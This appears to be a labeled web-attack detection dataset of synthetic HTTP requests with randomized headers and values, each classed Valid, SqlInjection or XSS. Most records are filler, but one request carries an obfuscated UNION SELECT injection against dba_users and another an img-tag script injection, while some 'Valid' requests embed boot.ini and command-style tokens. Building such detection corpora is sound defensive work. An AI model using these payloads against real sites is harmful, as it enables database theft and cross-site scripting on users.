GET /tI0WwqYmv/csqQBgslP_WSd3.W/4s.mspx?mao3BhefRMT=zfIae5x&l8lsRtyt=lmimea6hxtl&eli5t=72437619&ey=882&oedkhoEeegSs=ar%27&lteoa=33&7Obt=620308&Ecre=hqezu5cddwrfsNtre HTTP/1.1
Host: www.fS87e.uk:80
Connection: Cleian
Accept: */*
Accept-Charset: x-mac-chinesesimp, iso-8859-9;q=0.4, windows-1258, iso-2022-jp;q=0.8, cp-932
Accept-Encoding: deflate;q=0.6, identity;q=0.4
Accept-Language: ahomone-yzt;q=0.1, z1-rdv, eotuc-eesL8
Cache-Control: max-stale=132
Client-ip: 157.214.192.75
Cookie: sesgls7uqiYieae=41828528;4fnpn79isicte=81;LGmail-m=chgtio
Cookie2: $Version="39"
Date: Mon, 02 Jul 07 10:46:06 UTC
ETag: W/"5I-t-ACF@We_@x@jrE"
Expect: 100-continue
From: atOG@okZhh.fr
If-Modified-Since: Thu, 30 Aug 07 22:22:03 UTC
If-Unmodified-Since: Sun, 22 Jun 08 02:37:05 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: ye6h yMsthsrA=atyake
Authorization: Basic b2xhczpzbmlvb2lzbw==
Range: 018198-760671,-91
Referer: /stmqqce/e0Dgfh/utasn.css
TE: chunked;q=0.5
Trailer: Authorization
User-Agent: Mozilla/1.9 (compatible; MSIE 5.6; Linux i586; ed9Oelc8; rtorae; 7gwae)
UA-CPU: x86
UA-Disp: 2593,723,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 4622x2387
Via: 8.9 188.139.96.159:09
Transfer-Encoding: compress
Upgrade: miT2r5/5.1
Warning: 753 172.218.58.231 "ldoa" "Wed, 20 Apr 05 05:59:53 UTC"
X-Forwarded-For: 81.62.245.239
X-Serial-Number: 94210
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 305
Start - Id: 8146
class: Valid
GET /5Mdq/yiojld/3fbaoaaedAbb6J8sienu/sbvfes/jwgetk5G0/i@8OIeAcfZVEl/eV4lbBtKuVM-g8Tba/e3VpNl4/tmXPtlqj3-/d8DSvfIQXmIQpvYmg/etr2esiaihah/SallBBBGQRYuN32F.htm?rKt=rrsb%5C+wota&pnHu8usnDho=i4irbtttrtatcu&33eoue=ltteLtih+mh&vnrUb7eaAepthal=errip&ecrerayo7=6919039157&DqexAx=gE%3C&tsa6m=oo%7Eftvbm%2Fi-esnph-yxtes&hEtlilyoeec=t_m&t3GHjbqI9KOJ=7winnt&0hdcN0a=nY7O9W3lRlQf&esuUf8nNaaaaak=aipil&aOdYa=166363&3xkFiafetuh=568745 HTTP/1.0
Host: 86.227.156.196:80
Connection: keep-alive
Accept: application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: deflate;q=0.4
Accept-Language: abc6r-mc;q=0.9, i-egt;q=0.6
Cache-Control: no-cache
Client-ip: 112.149.51.58
Cookie: ors7p5inte=p@;rmts=ar?tieqlinkp
Cookie2: $Version="1"
Date: Wed, 23 Nov 05 22:02:58 GMT
ETag: W/"r3uChZTatGoPfz50Ll"
Expect: 100-continue
From: bHa9Ixr@cydbhep.be
If-Modified-Since: Wed, 13 Apr 05 20:36:48 UTC
If-Unmodified-Since: Fri, 07 Dec 07 21:37:22 GMT
If-Match: *
If-None-Match: "3M@oVf@vwmeB3t@"
If-Range: Wed, 24 Feb 10 16:52:02 UTC
Max-Forwards: 30
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: icItwz 0ideTrr=voci
Authorization: N4cN tEht=rnnodR6
Range: -340,51-69621,105-24
Referer: http://Ii13an.it/nllp/eMep/r02s.conf
TE: trailers,chunked,trailers
Trailer: Host
User-Agent: Mozilla/8.0 (Windows; U; Win98 4.8; 6N-1m; rv:8.6.7) Gecko/32467910
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 959x056
Via: HTTP/5.3 www.irWoOia.gif, 2.3 14.32.8.7, HTTP/3.5 www.idas4.jpg:96
Transfer-Encoding: deflate
Upgrade: 2eUjto/5.2, tqac/7.0, p0oik/8.4, 1mkNa/0.5
Warning: 719 254.167.216.254 "tiwetioUbhreaeei" 
X-Forwarded-For: 110.129.233.176
X-Serial-Number: 87696884099518703
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8146
Start - Id: 32768
class: Valid
PUT /6c/sQzwDx/oicsfnh/eyrrtemcamO7eeh/s.DAveqAcU6Z_94nW2g/MtcrRntriHbyTclshite/si5rTE/uIKywzEMLnySum_K/qelpmpnrlm9u.cgi? HTTP/1.1
Content-Length: 25
Content-Language: 8i,y
Content-Encoding: deflate
Content-Location: /soah3/uc0it4e/sDtpy/boeGpd9.pl
Content-MD5: dGVpZXNzZ2JBeWlvaWRJZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Oct 04 14:19:31 UTC
Last-Modified: Thu, 26 Jan 06 16:21:53 CET
Host: 178.212.159.68
Connection: soLcn
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 68.202.181.199
Cookie: fu1a6eaeftbswj=3054;d9l2rf6uyi=detisnhd30cdpdBq;b4pds3urcp@%uS=2%29l%22bE%2Fs4o%3Asue%22f;9yeCw=stuan;imyoei=aKR4AXhJtxir
Cookie2: $Version="561"
Date: Thu, 21 Apr 05 18:57:05 UTC
ETag: "iZ8m4dCHifFiyoUCsppk"
Expect: poeint
From: eadg@itnjs.uk
If-Modified-Since: Thu, 14 Feb 08 07:01:35 GMT
If-Unmodified-Since: Mon, 30 Mar 09 06:43:42 UTC
If-Match: *
If-None-Match: "HzSa-u-CU-T6NiBtwehv"
If-Range: Sat, 22 Sep 07 13:56:52 UTC
Max-Forwards: 40
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
Authorization: Digest algorithm=MD5
Range: 7780-1621,55-
Referer: http://www.tpdt.be/75el/tfedmhef/hN3tnmn/hrgfJn/ddpi6rsa.css
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: pZKcymU http://www.ihtht.com
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4217x4135
Via: 0.1 www.pdz0l.js, FTP/7.9 www.6old.tiff:5, 6.8 74.124.83.220
Transfer-Encoding: identity
Upgrade: cwnm/1.8, Pcnvc/2.3, tr9/5.6, ra7/0.0, seaag/7.9
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 233.105.54.63
X-Serial-Number: 59787959
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

EqHselectJUGNJub8=1984784

End - Id: 32768
Start - Id: 41741
class: SqlInjection
GET /jfistelea5toesjme/rusnmrwse0/aopgfsoehlisslknbr/ttiakykc/u6r6YlkbOp.jsp?8ot0h5icfe=chairs%27++++UN%2F**%2FION++++SEL%2F**%2FECT+++++rsr+++++FROM++++dba_users++++WHERE+ins+++like++%27%2525&vvI9La=22kkp&gzknitmhvi3=281&i7pw=tariodeOlzetEDrqnn&zuy=form+y&sNerRJ6A.Tr=-doSs9wtreNos0&0nH=704854&3CUepercdid=8403&ou=3367013&dam08=vdaehnpep0dr&cmd-sock_streamym=3ranjhh&nttadotn=m&seflwi=azrsen HTTP/1.0
Host: 35.253.9.11
Connection: snrmr
Accept: audio/*, text/xml, text/*;q=0.7
Accept-Charset: windows-1251, hz-gb-2312, big5;q=0.3, x-mac-icelandic;q=0.2, iso-8859-15
Accept-Encoding: *
Accept-Language: eoraYoda-ep6di, igb-s9g, aets0eh-TnHwea;q=0.5, atm-ez, ht9mgwis-1srs
Cache-Control: only-if-cached
Client-ip: 136.31.14.94
Cookie: bea=15
Cookie2: $Version="085"
Date: Mon, 14 Jan 08 14:13:09 GMT
ETag: "3RzLyYlW.gVQq0ScRi"
Expect: 100-continue
From: AEeu@io5oeTS.be
If-Modified-Since: Thu, 22 Oct 09 21:44:27 CET
If-Unmodified-Since: Thu, 15 Feb 07 05:30:17 UTC
If-Match: "-Ls_agbPEl6Cu_f1aFi"
If-None-Match: "Qb3J5Ez19jpJNWFv2K"
If-Range: Thu, 21 Jul 05 08:40:36 UTC
Max-Forwards: 7
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Digest opaque="ciu9uft"
Range: -9158,6593-962,-115779
Referer: /indo/eaQj/980shr/lsAtwdhQ.bin
TE: chunked;q=0.4,trailers
Trailer: Trailer
User-Agent: dtIaH/7.6.2.5.0
UA-CPU: 68000
UA-Disp: 570,952,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8130x9539
Via: 0.9 www.wtsr1.html, HTTP/0.5 www.7lyaTe.htm:67
Transfer-Encoding: identity
Upgrade: OcN/3.5, 0iet/4.6, opaid/9.4, RiWniu/3.2, egwh/3.6
Warning: 295 32.227.178.22 "oatocencd" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 81915611891
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41741
Start - Id: 16807
class: Valid
GET /Oz93/hjr/yentn00nraVoMa/nina/hnetchiLaaetd/aA1yr/snlD9DETlJ/_jP1@c6HJTtTI/union2G.js?SAservicesHXjLEVdkboot.ini=eVJI&etrYznrzuitn=2&1@rxWNCL=hmmo&SsenFmt=pop+a%7EM&iirreA=ePou2g&B6xd07@9V=lzZTbkv&ec9aosstsdrnh=hi2u&sUrhakqt2e=drmoo8eo&xheaahNistGIl=tC3Eg&sxiueTT1iEt=7357 HTTP/1.0
Host: www.umrehg.uk
Connection: close
Accept: audio/x-wav, application/x-tar;q=0.5
Accept-Charset: iso-8859-8;q=0.9, x-mac-japanese;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: t-fnm, ip-hter, wT-weet, euo11Iiw-Kta9hp7;q=0.5
Cache-Control: max-age=11
Client-ip: 105.115.194.61
Cookie: 0yO0gHqaor.8d=rmee;nvhcLloneire=iaf0t2esnreektu;nrwatwoNeh=rreoa\nnF;ZqbetcnQI=lay;zbOnso=eKESNk
Cookie2: $Version="799"
Date: Thu, 17 Jul 08 16:11:43 GMT
ETag: "eDJW6Hbje_@K5qFy"
Expect: 100-continue
From: qeirgp@9goyD.st
If-Modified-Since: Sun, 01 May 05 09:06:51 UTC
If-Unmodified-Since: Sat, 21 Jul 07 12:49:06 CET
If-Match: *
If-None-Match: *
If-Range: "dDh5-krbotmATM_GOh"
Max-Forwards: 7970
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Basic Q2VhbmF0ZDpnZWRrd211
Range: 20-,951-7,269801-
Referer: /aetdw/nbsemm0.sh
TE: gzip;q=0.4,gzip,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.1 (compatible; MSIE 6.9; Win 9x; lnhths)
UA-CPU: PowerPC
UA-Disp: 081,028,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 147x268
Via: 9.8 www.tosseyaa.shtml, HTTP/3.5 93.255.62.239
Transfer-Encoding: deflate
Upgrade: ypon/2.7, buer/1.4
Warning: 497 www.ovpt.tiff "wfnwo1sr6oEsmoes2E" "Wed, 13 Jul 05 15:15:36 GMT"
X-Forwarded-For: 28.244.33.30
X-Serial-Number: 60090044663
----: ---------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16807
Start - Id: 33254
class: Valid
POST /emttT/.mCQtmp7_Dreplacewhere0group byip-/ivqk/rWKrC/1gskTryedlhn/EDinL/sfZSxurvoQ8S/y2b7bino7puuh/lg9siohwut9.cfm? HTTP/1.0
Content-Length: 70
Content-Language: ctifSdeJ
Content-Encoding: identity
Content-Location: http://drcmda.it/l8uz/aO4isyd.sh
Content-MD5: dGthcG5mbm9kbm5SbXR0dw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Feb 04 05:51:09 GMT
Last-Modified: Thu, 20 Oct 05 01:12:34 UTC
Host: www.sc4h6b1o.fr
Connection: close
Accept: image/*;q=0.4, video/quicktime;q=0.2, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: daoea-jcgifo86;q=0.7, stseh-eeZlV
Cache-Control: no-store
Client-ip: 86.2.91.89
Cookie: oeti='3el;slat2=821mjf6Nv;tsmrte=0898990;Uulhperlrr=59
Cookie2: $Version="4"
Date: Wed, 17 Nov 04 05:52:51 CET
ETag: W/"X3Mh@UX2w-5Q_Th"
Expect: 100-continue
From: fhleens@leny2Irsni.it
If-Modified-Since: Tue, 07 Dec 04 18:53:38 UTC
If-Unmodified-Since: Fri, 18 Mar 05 20:46:50 UTC
If-Match: *
If-None-Match: "fWlBD.bsnHhHMtDJf-0"
If-Range: Sun, 12 Jul 09 02:22:16 UTC
Max-Forwards: 043
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM c1BoWW1uMmxyZWx0Y2lvYXJvZWhJeHBqMGNpZ2U2ZmFvc2VMYndo
Authorization: iUi3 Goeuteea=olzfmmn
Range: 79-128388,8-15392,-0
Referer: /twboafo.txt
TE: chunked;q=0.3,trailers,trailers
Trailer: TE
User-Agent: gs9imry
UA-CPU: 68000
UA-Disp: 088,074,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8624x050
Via: 6.2 www.aqynou.shtml
Transfer-Encoding: deflate
Upgrade: e1Tt3/7.1
Warning: 491 121.146.224.239 "hpTaxeemeyntdosrcyac" "Fri, 22 Sep 06 22:35:30 UTC"
X-Forwarded-For: 220.33.220.61
X-Serial-Number: 3445035771495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

._insertT2=1&gioOONakrci=39478109&So=806&@eEUuWz5=0&DhkQwdelete=823724

End - Id: 33254
Start - Id: 34753
class: Valid
PUT /Ne9ecbajsovloaeinu/FEP4oJautoexecB-lTtfrom/lEO2YEkWwJOrBus8/VxshutdownE9X5g_9I2replace_f/hlidte/nFeandhunL0h1lo4e/tWrsh9hnwhdtIetLae/sonSagtfct6vptthsos/tMYMbZWN@AU.pl? HTTP/1.0
Content-Length: 100
Content-Language: o,c
Content-Encoding: gzip
Content-Location: http://www.g6isli.uk/nrisa/yiit/acrn.htm
Content-MD5: aHFlb2k2dG5yYXlhU0F6YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Sep 05 12:09:58 UTC
Last-Modified: Thu, 11 Mar 10 20:52:33 CET
Host: 184.30.116.80
Connection: rheiA
Accept: video/*, audio/x-wav
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 157.24.126.22
Cookie: hclqv3c4eslet=+y;ZqBB0bAJ=1942;ODNlWCrcprmx=sFXdVnW5JdqA;muiiadehStnt=8214;laecwzdfnO=9t1d.uZl;atEomzssxomutns=tDo5s.
Cookie2: $Version="29"
Date: Thu, 14 Oct 04 15:40:17 UTC
ETag: "_Arr8qPQxSrMwBWpL3d"
Expect: 100-continue
From: iaoc1brO@mxbt8wsL.be
If-Modified-Since: Tue, 14 Aug 07 18:31:15 CET
If-Unmodified-Since: Mon, 23 Aug 04 01:14:57 GMT
If-Match: "Us4VZdou0xOrYBcwtn9"
If-None-Match: "h4LTAnqOOxiQP@mGRKo"
If-Range: *
Max-Forwards: 5132
MIME-Version: 3.1
Pragma: t=heqhit
Proxy-Authorization: Digest nonce
Authorization: haleh 6Ernta=e6sche
Range: 019-
Referer: /0a6t.mpeg
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/1.9 (Machintosh; U; Mac OS X 8.0; cI-ns; rv:1.6.6) Gecko/15506111
UA-CPU: 68000
UA-Disp: 807,514,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 012x6742
Via: FTP/6.5 224.60.73.32, 3.7 10.198.123.20:25
Transfer-Encoding: deflate
Upgrade: r4ic/7.1, 0fe/0.7
Warning: 123 100.107.127.239 "n5ewoMdyi4" "Fri, 13 Oct 06 14:28:46 GMT"
X-Forwarded-For: 24.228.137.43
X-Serial-Number: 8267769973
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

EPkausDn=e9wwindow.open9&oCKemQS=z&tGteOtorD1=fwtdd&emb6dehhuaurtek= reimnRcoOe2rs&tiTeftulOEfnatt=1

End - Id: 34753
Start - Id: 21817
class: Valid
GET /z9eoeycsejG/taRnriseU/gmxu9ahNFtx/ybB@yz4/wQ6Gd-/nhfo98lSaaSE.asp?@qxsKx=tr4Asoapah&tnFlml=nwinnte&h0J7=2onssrbs&NoFo=ptsuticag&lintet=4B%40sF5yBllLc HTTP/1.0
Host: www.0sdml7mef.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip, compress;q=0.9
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 196.172.163.174
Cookie: dl=aIm_fG8ta
Cookie2: $Version="6"
Date: Sun, 14 Feb 10 04:24:31 CET
ETag: "2t02ZoykLhvXorAAI1"
Expect: e9ns
From: xeSesas@ehlnerstil.com
If-Modified-Since: Wed, 07 Apr 04 11:31:32 GMT
If-Unmodified-Since: Thu, 16 Aug 07 05:35:47 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Jan 09 14:12:39 CET
Max-Forwards: 1107
MIME-Version: 1.2
Pragma: eqngEt='ieSE6c'
Proxy-Authorization: NTLM cXJlYXNDbkE2enhlbW40aHI0emdld2hlb296aWU3bm4=
Authorization: 4z9er vahih=tey9oe
Range: 728147-66,8714-380,41-
Referer: /oefd6hnh/iopRr/onTdzen/onncoag/oqeoPee.php
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: d.esEdUT http://www.GrcapHh.st
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 318x304
Via: HTTP/8.9 www.yu8nrre.css, 8.2 213.164.192.104
Transfer-Encoding: deflate
Upgrade: eAsu/5.0, gdb/6.1
Warning: 052 www.rdtt1ah.js "6g169" 
X-Forwarded-For: 32.5.142.115
X-Serial-Number: 8436166703567420278
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21817
Start - Id: 14028
class: Valid
GET /ulocationFu_Ievalh/9HVIyok4EXPftpformyV/sFRaM9w3dGLV0h/lGeodRndolge3em1ers/srshtyC9losst/rvunaaa8tyzedftl/rttEwcaotehvt/iel.js?ceNtscajfoexAf=p%24sii&tAiwaetrryes=n+&tlematbset9elne=sPC%40M3 HTTP/1.0
Host: 33.224.245.181:80
Connection: rnkoa
Accept: */*;q=0.0
Accept-Charset: gb2312;q=0.6, iso-2022-jp;q=0.9, us-ascii
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 96.142.255.82
Cookie: DatBdri6tm1a4=578;q4c0taee14Eruib=aiPbH.
Cookie2: $Version="19"
Date: Mon, 15 Jun 09 10:21:55 UTC
ETag: "BL8IO2.W.cvsQdvjJOWQ"
Expect: 100-continue
From: aeeaqe@ea10ef.st
If-Modified-Since: Sun, 10 Aug 08 12:12:58 GMT
If-Unmodified-Since: Wed, 07 Jul 04 18:54:07 GMT
If-Match: "A49c.QRZ1trQT66Gg-cK"
If-None-Match: "@xjAXGNOyoNjSrU"
If-Range: Fri, 14 Nov 08 15:17:24 GMT
Max-Forwards: 0
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Basic YXZlMzU6aTJtdTVlUmk=
Authorization: Basic cm9ybDpFbUhJdGVl
Range: -2,-28865
Referer: http://www.awormmwh.net/cltwsoe/nesa/rwss/enehauee.php3
TE: trailers
Trailer: Date
User-Agent: bHENg6LTYf http://www.8imrce.de
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 8443x481
Via: HTTP/1.5 www.ngnsi5es.js, HTTP/2.8 92.143.67.166, HTTP/9.8 177.127.12.213:72
Transfer-Encoding: identity
Upgrade: eEeZe/7.4, Zmitao/2.6, hfrDo/5.0
Warning: 303 27.61.130.243 "4sxeeeopTs5wI" "Mon, 20 Nov 06 24:32:15 UTC"
X-Forwarded-For: 157.125.101.111
X-Serial-Number: 0043438224132828242
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14028
Start - Id: 32843
class: Valid
PUT /v3LiKfa4p/5lpon9aitneraZahOrii.tiff? HTTP/1.0
Content-Length: 208
Content-Language: ssd,e4bsi
Content-Encoding: gzip
Content-Location: http://www.zNejolei.biz/lamt.asmx
Content-MD5: c24yYW50cWFzb2FudGlycg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Sep 07 17:27:48 CET
Last-Modified: Mon, 26 Jul 04 12:05:21 CET
Host: 200.87.141.111
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: identity;q=0.0, gzip;q=0.8, compress;q=0.4, compress;q=0.6, deflate;q=0.8
Accept-Language: *;q=0.5
Cache-Control: max-stale=6008
Client-ip: 50.137.205.249
Cookie: hemkf68nin=Ireualawmtz
Cookie2: $Version="941"
Date: Thu, 18 Mar 04 01:50:31 CET
ETag: W/"pkoaBVwAxHTMGMSn2"
Expect: admage=2ihmr
From: hqso@atPmE.de
If-Modified-Since: Mon, 31 Jul 06 11:12:53 UTC
If-Unmodified-Since: Tue, 27 Mar 07 10:16:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic N1l0QTY6bnV5bmhnbw==
Authorization: Basic b2xlQTpiZWZiemF0
Range: 2086-1,90-
Referer: http://www.totokus.fr/totb/aeSEe.tiff
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/3.6 (Windows; U; Win 9x 8.8; 39-pw; rv:5.7.7) Gecko/96273928
UA-CPU: StrongARM
UA-Disp: 1558,006,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 968x4170
Via: sai/5.9 www.qvlag.htm
Transfer-Encoding: deflate
Upgrade: d8jw0/9.1
Warning: 416 252.235.193.93 "neHp9eaees" 
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

nsieorakX=95278&tedenht7n=z7ehv&eescreae85Ino=ge4iusrx  w4Lotevalt@&srleai0r4nro7=ap|9i%u(&ahrhndnyjChrkh=pSG3qFBF&9nffhmycthntgct=8&IaZ2nr2DUlys=0827&ki=veosa7dtmjFtoBo&QyJBt=nys&Py=f |wNnl?=nn

End - Id: 32843
Start - Id: 17240
class: Valid
GET /e@hK@/AQj-pi2/y7ZBlIBJwvkZhIE/ssnoarEdtLotrbn6et/e6qanL/er9EdgMgyisinppEe/pm5Wny0oZoRkj-Y.png? HTTP/1.0
Host: www.ieialht.ch:80
Connection: i7Yiy
Accept: audio/basic;q=0.5
Accept-Charset: *;q=0.1
Accept-Encoding: gzip;q=0.8, compress, gzip, deflate;q=0.3, gzip;q=0.9
Accept-Language: *;q=0.7
Cache-Control: co0ly=tcn
Client-ip: 24.177.19.145
Cookie: Hrdnea8so=n_UcQk2v9SCr;lttugeqx4wur=812;4logia=\r4;nph-ld;yN5frtiE=pht0svllssosock_streamho
Cookie2: $Version="7"
Date: Tue, 08 Sep 09 21:05:59 CET
ETag: "8bOe8rjR0Y@Tu.O.Xqmo"
Expect: UaTcwl=l6esxf;emshalr6=rllY
From: tytiiae@0oytu.it
If-Modified-Since: Fri, 05 Dec 08 08:11:02 GMT
If-Unmodified-Since: Sun, 29 May 05 03:38:00 CET
If-Match: "jmQXKv5-YqmzrUshNzD"
If-None-Match: *
If-Range: Sun, 11 Jul 04 23:26:44 CET
Max-Forwards: 50
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM bmx0YTA2dGVkcDkwdHNzdG51ZHNoZTNuZG5obWJhYXJvcmRtZg==
Authorization: Basic dDlhZWFuOnRkYWR4bg==
Range: 05-17060,-116,33-
Referer: http://dsRlnl.uk/EhonitR/i5wmheTO/igrf.jpeg
TE: deflate;q=0.1,gzip;q=0.5
Trailer: If-Modified-Since
User-Agent: Mozilla/6.7 (Windows; U; Win98 2.2; it-cP; rv:3.9.5) Gecko/50316653
UA-CPU: StrongARM
UA-Disp: 121,6829,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 425x7082
Via: HTTP/1.7 www.xc84ea.htm, HTTP/8.3 5.97.177.149:34131
Transfer-Encoding: gzip
Upgrade: e7eli/6.7, 5Tued/6.2
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 835471798337
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17240
Start - Id: 30802
class: Valid
GET /ctiUieglRd3redhui4u/nlatlcceksaoyehsrpN/bNIdeLedp/rKMx/9dacceptf.nsf? HTTP/1.0
Host: 243.133.67.207
Connection: ndme
Accept: */*
Accept-Charset: x-mac-japanese, shift_jis
Accept-Encoding: deflate, compress, deflate;q=0.0
Accept-Language: dgsatNe-0csbixm;q=0.9, hena65ir-unE6dLs;q=0.9, shThbO-H, hDl-rtm
Cache-Control: no-cache
Client-ip: 134.178.65.51
Cookie: tea=2
Cookie2: $Version="8"
Date: Sat, 28 Jan 06 08:50:33 CET
ETag: "r8GbOFMovVI_ULq"
Expect: Ntiuo5t
From: eauh@chhrgB5dy.biz
If-Modified-Since: Sat, 17 Mar 07 11:59:33 CET
If-Unmodified-Since: Sun, 18 Sep 05 10:16:00 GMT
If-Match: *
If-None-Match: *
If-Range: "NUu.CbdcflB9H_K"
Max-Forwards: 22
MIME-Version: 6.9
Pragma: pnih='ahser'
Proxy-Authorization: nuit2t Ja4ekbcr=ksnl
Authorization: Basic Z2xydTpyY3RhaXpiZA==
Range: 40-,5809-053,-843
Referer: http://www.annucn3.org/reean/iLre/seiTs6/erafjse/Ddagdi.asp
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: uiArrmaa7oh9ew7e7jd
UA-CPU: 68000
UA-Disp: 384,8584,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0063x004
Via: HTTP/7.1 189.223.230.239
Transfer-Encoding: nsz2; wrsw0Z=ibc8
Upgrade: uIT/1.8, hdv/9.8
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30802
Start - Id: 47269
class: XSS
GET /6mqn/otK.bFdo_z/tjrnrnrhsoeee/gEI4g/setn2UmaN_/WsHt9D2mZOMW/r1/y8ece5oerlsue/7rw6slcmTR4glnodMauS.htm?IoRa=r73DAjPYNAo&N2tmpCU6XL4T=0607960&h0v5ACish=ihttpe2&N1winntGO5nIPA-=e%3Aeu%26+efboot.ini%25e&pduiap4v9etsod=eH7NrPnp%40n9I&dnc3uesfdIsoa=%3Cimg+++src%3D%26%7B%5Balert+%28%27uOlr1q%27%29%3B%5D%7D%3B+%3E&TS0aletmpO=neatoitaisaxrua HTTP/1.1
Host: www.aekb.de
Connection: tNdM
Accept: audio/*;q=0.2
Accept-Charset: iso-8859-6, big5;q=0.8
Accept-Encoding: deflate;q=0.1
Accept-Language: *
Cache-Control: max-stale=2
Client-ip: 10.37.184.28
Cookie: eeiotmjsJrde=eEeatf<oe';gobe=|agerwseb
Cookie2: $Version="86"
Date: Tue, 30 Mar 04 09:51:06 GMT
ETag: W/"@N7GG..KkIBBJaTNB"
Expect: ntthjebs
From: mrdmtn@ziesi15.ch
If-Modified-Since: Mon, 23 Mar 09 13:18:17 UTC
If-Unmodified-Since: Fri, 25 Nov 05 07:59:29 GMT
If-Match: *
If-None-Match: "l3Hl775Y3-0BG2s"
If-Range: *
Max-Forwards: 31
MIME-Version: 3.6
Pragma: sit=iohoHeh
Proxy-Authorization: Basic c0lkZHRkNTpucmZH
Authorization: Basic T2V3bmthbjpMZ2kxZmE=
Range: 3-25949,-0524
Referer: /tt9gat/TttxSpl/a3dunete/ewtgey.mspx
TE: gzip,chunked;q=0.8
Trailer: Warning
User-Agent: g9aaojsd/5.4.3
UA-CPU: Sparc
UA-Disp: 263,853,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 753x7661
Via: 9.2 128.108.130.25:4
Transfer-Encoding: deflate
Upgrade: 2gkxie/3.5, ehnI/4.4
Warning: 816 www.tnnynhia.jpg:19076 "wwNrihTcIteeag" "Sat, 20 Oct 07 01:41:20 GMT"
X-Forwarded-For: 228.59.131.84
X-Serial-Number: 15152704800
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47269
Start - Id: 33740
class: Valid
POST /n0i/b-5ecp/eKWm3GLsil/in/rA/aQn7/mGzz8h82XA/yzGB1f691f_XN4/hKMA5A27CIrz/oyqe.htm? HTTP/1.0
Content-Length: 112
Content-Language: ds
Content-Encoding: gzip
